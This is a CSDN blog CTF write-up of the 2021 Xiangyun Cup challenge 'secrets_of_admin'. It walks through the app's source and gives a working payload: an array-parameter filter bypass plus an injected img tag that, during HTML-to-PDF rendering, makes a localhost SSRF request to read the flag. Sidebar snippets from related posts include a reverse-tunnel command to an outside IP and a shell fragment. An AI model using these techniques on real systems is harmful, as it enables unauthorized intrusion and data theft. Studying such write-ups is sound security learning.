[2021祥云杯]secrets_of_admin

已于 2023-11-23 23:03:20 修改
阅读量192 收藏
点赞数
文章标签: 数据库
于 2023-10-23 19:20:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64348326/article/details/133996904
版权

1.题目给了源码,简单看了一下,重点需要关注/routes/index.js中的三个路由和数据库执行文件database.ts即可

2.首先看到database.ts文件,一共两张表:users、files,其中users表中里面保存了admin用户的账号密码,另外再往files表中插入了一条文件数据,这里到下面再解析。

image-20231023183803511

3.利用给出的账号密码登陆admin账号,接下来看到router.post('admin')这个路由,checkAuth函数我们是已经通过校验的,因为我们账号并不是superuser/login路由就已经isadmin=1了。这个/admin路由主要看我们输入的数据content,它会先嵌入template中,再被packjson文件中安装的pdf包的toFile()方法转换为pdf文件,再写入到随机uuid的文件名内。

const checkAuth = (req: Request, res:Response, next:NextFunction) => {
    let token = req.signedCookies['token']
    if (token && token["username"]) {
        if (token.username === 'superuser'){
            next(createError(404)) // superuser is disabled since you can't even find it in database :)
        }
        if (token.isAdmin === true) {
            next();
        }
        else {
            return res.redirect('/')
        }
    } else {
        next(createError(404));
    }
}

image-20231023183626914

4.下面又调用了getCheckSum方法,该方法按照文件的哈希值生成了一段校验码。然后调用DB.create()方法将我们上传转换的pdf文件名和校验码给插入到数据表files中了。

const getCheckSum = (filename: string): Promise<string> => {
    return new Promise((resolve, reject) => {
        const shasum = crypto.createHash('md5');
        try {
            const s = fs.createReadStream(path.join(__dirname , "../files/", filename));
            s.on('data', (data) => {
                shasum.update(data)
            })
            s.on('end', () => {
                return resolve(shasum.digest('hex'));
            })
        } catch (err) {
            reject(err)
        }
    })
}

image-20231023184718140

5.接下来我们直接先看'/api/files/:id'路由,该路由首先会判断我们是否为superuser用户,接下来调用DB.getFile方法,根据我们的token中的用户admin和我们get中传递的校验码id在files表中查找相关信息,并取得文件名,在/files/目录下将文件给返回。这个时候就要联系上一步分析的/admin上传方法了,在这个路由,我们根本看不到我们之前输入的数据content转化成的pdf文件。因为以下两点:

  • 首先,校验码是转化后的pdf文件哈希值,这个我们根本不知道是什么。
  • 其次,一开始审计的时候注意到这一块插入files表并没有做预编译,但通过上面分析完结果才发现这三个参数都是固定死的。注意插入的数据库语句: await DB.Create('superuser', filename, checksum),也就是INSERT INTO files(username, filename, checksum) VALUES('superuser', {'uuid}.pdf', '{hash_value}');。这里固定死了是superuser用户,因此我们admin用户再怎么输入的数据转换的文件,都不可能被查询得到。
router.get('/api/files/:id', async (req, res) => {
    let token = req.signedCookies['token']
    if (token && token['username']) {
        if (token.username == 'superuser') {
            return res.send('Superuser is disabled now');   
        }
        try {
            let filename = await DB.getFile(token.username, req.params.id)
            if (fs.existsSync(path.join(__dirname , "../files/", filename))){
                return res.send(await readFile(path.join(__dirname , "../files/", filename)));
            } else {
                return res.send('No such file!');
            }
        } catch (err) {
            return res.send('Error!');
        }
    } else {
        return res.redirect('/');
    }
});

image-20231023185515309

6.其实我们下载的文件中,目录还有一条信息,那就是flag文件一开始就存在于/files/目录下的。而我们第一步开始分析的初始化时,往files表中插入的下面这条初始化的sql数据。尽管我们有可传递的flag文件校验码(该文件的哈希值),但是该文件所属的superuser用户根本不存在的。所以我们如果用admin用户的身份来传递这条校验码,也是在数据表files中查询不出数据的。

INSERT INTO files (username, filename, checksum) VALUES ('superuser','flag','be5a14a8e504a66979f6938338b0662c');`)

7.这个时候,最后看的那个路由/api/files就是破局的关键。当我们访问这个路由,并传递对应的参数,它就可以给我们往files表中插入一条自定义的数据。这里我们不但解决了校验码未知的问题,并且还解决了查询用户固定为superuser的问题,同时又能顺利读取/files/目录下flag文件。但是又有个问题,那就是这里需要本地127.0.0.1进行访问,也就是需要ssrf。

router.get('/api/files', async (req, res, next) => {
    if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') {
        return next(createError(401));
    }
    let { username , filename, checksum } = req.query;
    if (typeof(username) == "string" && typeof(filename) == "string" && typeof(checksum) == "string") {
        try {
            await DB.Create(username, filename, checksum)
            return res.send('Done')
        } catch (err) {
            return res.send('Error!')
        }
    } else {
        return res.send('Parameters error')
    }
});

8.又回到了最开始/admin,我们唯一可利用的输入点就在那里。这里提一下,当我们把html文本转为pdf时,里面的script脚本文件会自动加载解析。也就是这里能触发xss,当我们构造一个图片src或者别的标签自定义弹窗时,就可以构造请求本地的/api/files了。

router.post('/admin', checkAuth, (req, res, next) => {
    let { content } = req.body;
    if ( content == '' || content.includes('<') || content.includes('>') || content.includes('/') || content.includes('script') || content.includes('on')){
        // even admin can't be trusted right ? :)  
        return res.render('admin', { error: 'Forbidden word 🤬'});
    } else {
        let template = `
        <html>
        <meta charset="utf8">
        <title>Create your own pdfs</title>
        <body>
        <h3>${content}</h3>
        </body>
        </html>
        `
        try {
            const filename = `${uuid()}.pdf`
            pdf.create(template, {
                "format": "Letter",
                "orientation": "portrait",
                "border": "0",
                "type": "pdf",
                "renderDelay": 3000,
                "timeout": 5000
            }).toFile(`./files/${filename}`, async (err, _) => {
                if (err) next(createError(500));
                const checksum = await getCheckSum(filename);
                await DB.Create('superuser', filename, checksum)
                return res.render('admin', { message : `Your pdf is successfully saved 🤑 You know how to download it right?`});
            });
        } catch (err) {
            return res.render('admin', { error : 'Failed to generate pdf 😥'})
        }
    }
});

9.这里有waf过滤了尖括号这些,参考别的文章可以用数组进行绕过。直接用img标签即可,试了一下meta标签,环境直接崩溃。

payload:content[]=<img+src%3D"http%3A//127.0.0.1:8888/api/files?username%3Dadmin%26filename%3Dflag%26checksum%3D666">

10.最后直接访问/api/files/666即可下载flag,后面试了script标签的window跳转和AJAX发送也是可以的。

光迹ovo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
杯2021web writeup
hezhing
08-27 2795
太菜了,一个web都没做出来。接下来是复现。好好学习一下大佬们的姿势,也记录一下。 参考师傅们的wp,网上有的,侵权删。
[2021杯]secrets_of_admin writeup + TypeScript看看
ShenZ的博客
04-04 2360
[2021杯]secrets_of_admin writeup + TypeScript看看思路: > `admin`路由中:content传入一个src属性的标签触发SSRF并访问`api/files`路由,利用`/api/files`在files表中为admin用户创建一个flag文件,然后通过`/api/files/:id`路由来读取该文件。 相关漏洞: >1.src属性的标签在html中可以自动触发,或者说是HTML转PDF时,HTML里面的图片资源被自动加载进来 >2.includes()方
The_SECRETS_OF_POWER_NEGOTIATING_-_ROGER_DAWSON2.pdf
04-29
商务谈判中采用怎样的说话逻辑,如何再谈判之前进行有条理的准备。此书是一点一点粘贴复制的,并非扫描版。
Secrets_for_All_the_Things:The_Injection_of_Secrets_for_Every
08-29
Secrets_for_All_the_Things:The_Injection_of_Secrets_for_Every_Application_in_Your_Cloud-Agnostic_Environment 安全 APT 业务风控 企业安全 安全人才
Undocumented_Secrets_of_MATLAB_Java_Programming.part3
03-20
Undocumented_Secrets_of_MATLAB_Java_Programming.part3 Undocumented_Secrets_of_MATLAB_Java_Programming 第3部分(共3部分) http://undocumentedmatlab.com/books/matlab-java This book shows how using Java can significantly improve Matlab program appearance and functionality. This can be done easily and even without any prior Java knowledge. Readers are led step-by-step from simple to complex customizations. Within the book’s 700 pages, thousands of code snippets, hundreds of screenshots and ~1500 online references are provided to enable the utilization of this book as both a sequential tutorial and as a random-access reference suited for immediate use. This book demonstrates how: The Matlab programming environment relies on Java for numerous tasks, including networking, data-processing algorithms and graphical user-interface (GUI) We can use Matlab for easy access to external Java functionality, either third-party or user-created Using Java, we can extensively customize the Matlab environment and application GUI, enabling the creation of visually appealing and usable applications No prior Java knowledge is required. All code snippets and examples are self-contained and can generally be used as-is. Advanced Java concepts are sometimes used, but understanding them is not required to run the code. Java-savvy readers will find it easy to tailor code samples for their particular needs; for Java newcomers, an introduction to Java and numerous online references are provided. No toolbox, Simulink or Stateflow is necessary for using this book – only the core Matlab product. These extra tools indeed contain many other Java-based aspects, but they are not covered in this book. Perhaps a future book will describe them. This book shows readers how to use and discover the described components, using nothing but Matlab itself as the discovery tool. In no case is illegal hacking implied or necessary for the discovery or usage of anything presented in this book. As far as I know, everything in this book is legal and within the bounds of the Matlab license agreement.
_OceanofPDF.com_Smarter_Faster_Better__The_Secrets_of_Bein_-_Charles_Duhigg.pdf
03-27
Smarter_Faster_Better_
杯2021 Web复现
feng的博客
08-25 1811
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
杯题解
蚁景网安学院
08-25 2100
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 # bad_cat战队WRITEUP 一、 战队信息 战队名称:bad_cat 战队排名:6 二、 解题情况 三、 解题过程 web **1、**ezyii 网上搜yii的1day https://xz.aliyun.com/t/9948#toc-6 思路类似于第四条链子 exp: <?p.
杯2022 writeup
渗透测试研究中心
11-02 1813
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
secrets_of_the_oracle_database
09-08
secrets_of_the_oracle_database
杯-WRITEUP-bad_cat战队
qq_44005305的博客
02-21 381
先监听后上传,就不会报500的错误了 此时再去submit sessions sessions id 执行拿到shell再 bash -i 2>&1 ,上传一个ew内网穿透(github.com/idlefire/ew…%25EF%25BC%258Cchmod%25E4%25B8%258B "https://github.com/idlefire/ew)%EF%BC%8Cchmod%E4%B8%8B") msf的upload shell执行 ./ew -s rssocks -d 82.157.25.143
[2021东华杯]Web Writeup
feng的博客
11-01 3468
EzGadget 给了源码,IDEA打开看看,有个反序列化的点: @ResponseBody @RequestMapping({"/readobject"}) public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception { byte[] b = Tools.base64Decode(data); I
【MySQL精通之路】SQL优化(1)-查询优化(1)-WHERE子句
Anakki的博客
05-22 668
与PRIMARY KEY或UNIQUE索引上的WHERE子句一起使用的表,其中所有索引部分都与常量表达式进行比较,并定义为NOT NULL。由于MySQL会自动进行类似的优化,因此您通常可以避免这项工作,并将查询保留为更易于理解和维护的形式。因为MySQL优化器的开发工作还在进行中,所以这里并没有记录MySQL优化器所有的优化。您可能会试图重写查询以加快算术运算,同时牺牲可读性。,这有助于简化join连接。有关更多信息和示例,请参见“有关更多信息,请参见“空表或只有一行的表。
电脑同时配置两个版本mysql数据库常见问题
xiao_kelai的博客
05-21 480
在每一个命令中,mysql要选择是那个,如果都配置在环境变量中,要修改名字,不然可能会出错,在搞mysql57版本的时候就用mysql57.exe 和 mysqld57.exe ,注意每条命令,不要在创建的时候用混了,到时候又得卸载重来。例如 mysql -u root -p 改为 mysql57 -u root -p 这个时在57版本中。win登录的话,复制密码后,输入mysql57 -P3305 -u root -p 之后可以点击右键粘贴密码。
Linux文件操作——实现cp指令以及模拟修改配置文件
shion1114的博客
05-23 346
cp 1.c 2.c功能是将(内容相同,实现拷贝)main函数的参数由编译结果可知,总共有三个输入参数,同时输出每个参数字符串内容。
Mongodb分布式id
最新发布
littleschemer的博客
05-25 676
分布式ID是指在分布式系统中用于唯一标识每个元素的数字或字符串。本文主要讲解mongodb分布式id的解决方案,并从实际测试代码验证产生的id在不同集合是否也是保证全局唯一。
《Python编程从入门到实践》day36
m0_37565294的博客
05-22 1842
我们要编写一个名为“学习笔记”的Web应用程序,让用户能够记录感兴趣的主题,并在学习每个主题的过程中添加日志条目。django-admin startproject learning_log . # 新建一个名为learning_log的项目,末尾的句点让新项目使用合适的目录结构。运行命令ls,其输出表明Django有创建一个db.sqlite3.SQLite使用一种使用单个文件的数据库。# 包含4个文件(settings.py、urls.py、wsgi.py、__init__.py)
数据访问与Spring Data JPA
无远弗届
05-25 578
假设我们要处理一个用户表(users),可以创建一个User@Entity // 标识这是一个实体类 public class User {@Id // 标识这是主键字段 @GeneratedValue(strategy = GenerationType . AUTO) // 主键生成策略 private Long id;// Getter 和 Setter ... }@Entity // 标识这是一个实体类 public class User {
secrets_client,get_secret_value_response,SecretId=secret_name
06-13
这是使用 AWS SDK for Python (Boto3) 获取 AWS Secrets Manager 中的 secret 的代码行。其中,`secrets_client` 是一个 AWS Secrets Manager 的 client 对象,用来执行获取 secret 的操作;`SecretId` 参数指定了要获取的 secret 的名称或 ARN;`get_secret_value_response` 则是获取到的 secret 的值,是一个字典对象,包含了 secret 的信息。 下面是一个示例代码,获取指定名称的 secret 的值: ``` import boto3 # 创建 AWS Secrets Manager 的 client 对象 secrets_client = boto3.client('secretsmanager') # 指定要获取的 secret 的名称或 ARN secret_name = 'my-secret' # 获取 secret 的值 get_secret_value_response = secrets_client.get_secret_value(SecretId=secret_name) # 获取 secret 的值,如果是 JSON 格式,则解析成字典对象 if 'SecretString' in get_secret_value_response: secret = get_secret_value_response['SecretString'] else: secret = get_secret_value_response['SecretBinary'] ``` 注意:在使用 `get_secret_value()` 方法获取 secret 值时,需要有对应的权限。同时,获取到的 secret 值应当妥善保管,避免泄露。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值